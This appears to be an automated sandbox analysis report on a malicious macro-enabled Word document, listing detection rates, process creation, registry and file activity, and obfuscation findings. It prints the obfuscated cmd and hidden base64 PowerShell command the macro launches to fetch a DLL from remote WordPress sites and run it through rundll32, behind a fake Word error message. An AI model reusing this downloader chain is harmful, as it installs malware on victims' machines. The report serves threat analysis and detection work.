                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....8.......0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....@.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v............0...............................................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E..........................j....................................}..v.... .......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................d..j.....Fg.............................}..v....p.......0.......................r.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....(...............................}..v............0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......d..j.....Fg.............................}..v....8.......0................Cg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....p.......0...............8Dg.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................".j.....(..............................}..v......$.....0.................g.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................".j.....(..............................}..v.....*%.....0.................g.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
                      Source: 68254_2001.docVirustotal: Detection: 46%
                      Source: 68254_2001.docMetadefender: Detection: 48%
                      Source: 68254_2001.docReversingLabs: Detection: 75%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',EFdBQhtlp
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',EsaISiHxs
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8ALwBrAGUAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',EFdBQhtlp
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',EsaISiHxs
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2112185390.0000000002AF0000.00000002.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: 68254_2001.docStream path 'Macros/VBA/Tuem7y_4cvap' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Tuem7y_4cvap
                      Document contains an embedded VBA with many randomly named variablesShow sources
                      Source: 68254_2001.docStream path 'Macros/VBA/Tuem7y_4cvap' : High entropy of concatenated variable names
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOQBNAHMANgAzACAAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADAAfQB7ADIAfQB7ADEAfQB7ADMAfQAiACAALQBmACAAJwBTAFkAcwB0AEUAJwAsACcATwAuAEQAaQByAGUAYwAnACwAJwBtAC4ASQAnACwAJwB0AE8AcgBZACcAKQA7ACAAIABTAEUAdAAtAHYAQQByAEkAQQBCAGwAZQAgAHkAUQBLAG0AdAAgACAAKAAgACAAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsANQB9AHsANwB9AHsANAB9AHsAOAB9AHsAMQB9AHsANgB9AHsAMwB9AHsAMgB9ACIALQBmACcAUwBZAFMAJwAsACcASQBDAGUAcABvAEkAbgBUACcALAAnAGUAUgAnACwAJwBBAEcAJwAsACcALgBTAGUAUgAnACwAJwB0AEUATQAuAE4AZQAnACwAJwBtAEEATgAnACwAJwBUACcALAAnAFYAJwApACAAKQA7ACAAJABCAGIAMgB1ADIAYwA5AD0AJABYADIANwBGACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABaADEAMgBHADsAJABSADgANABGAD0AKAAnAFEAMgAnACsAJwAwAEwAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABpAHQAZQBtACAAdgBhAFIAaQBhAGIAbABlADoAOQBNAFMANgAzACkALgB2AGEAbAB1AEUAOgA6ACIAYwByAEUAYQB0AEUAYABEAEkAYABSAGUAYwBUAE8AUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAVwAnACsAJwAwAGYAJwArACcATwAnACsAJwBjAG0AJwArACcAZABfACcAKwAnAGsAJwArACgAJwBlAFcAMAAnACsAJwBmACcAKQArACgAJwBRAHEAdwA4AG4AYgAnACsAJwBoAFcAJwArACcAMABmACcAKQApAC4AIgBSAEUAYABwAEwAYQBjAEUAIgAoACgAWwBDAEgAQQBSAF0AOAA3ACsAWwBDAEgAQQBSAF0ANAA4ACsAWwBDAEgAQQBSAF0AMQAwADIAKQAsACcAXAAnACkAKQApADsAJABNADYANwBOAD0AKAAoACcATQAnACsAJwAyADkAJwApACsAJwBEACcAKQA7ACAAIAAkAFkAUQBLAE0AdAA6ADoAIgBzAEUAQwBgAFUAYABSAEkAdABgAFkAUAByAG8AdABgAE8AYwBvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAEwAMQAwAEIAPQAoACcAUAAnACsAKAAnADYAOAAnACsAJwBSACcAKQApADsAJABVAHoAaQAxAGgAMQBxACAAPQAgACgAJwBBACcAKwAoACcAMwAwACcAKwAnAEYAJwApACkAOwAkAEwANQA1AE8APQAoACcAVAAnACsAKAAnADYANwAnACsAJwBZACcAKQApADsAJABSAGQAdABhAGwANAB2AD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ATwBjAG0AJwArACcAZAAnACsAJwBfAGsAZQB7ACcAKwAnADAAfQBRAHEAJwArACgAJwB3ACcAKwAnADgAbgBiACcAKQArACcAaAAnACsAJwB7ADAAfQAnACkALQBGAFsAQwBoAGEAUgBdADkAMgApACsAJABVAHoAaQAxAGgAMQBxACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABMADcAMgBRAD0AKAAnAFgANAAnACsAJwBfAFMAJwApADsAJABOAHMAegBvADgAaQAxAD0AKAAnAHMA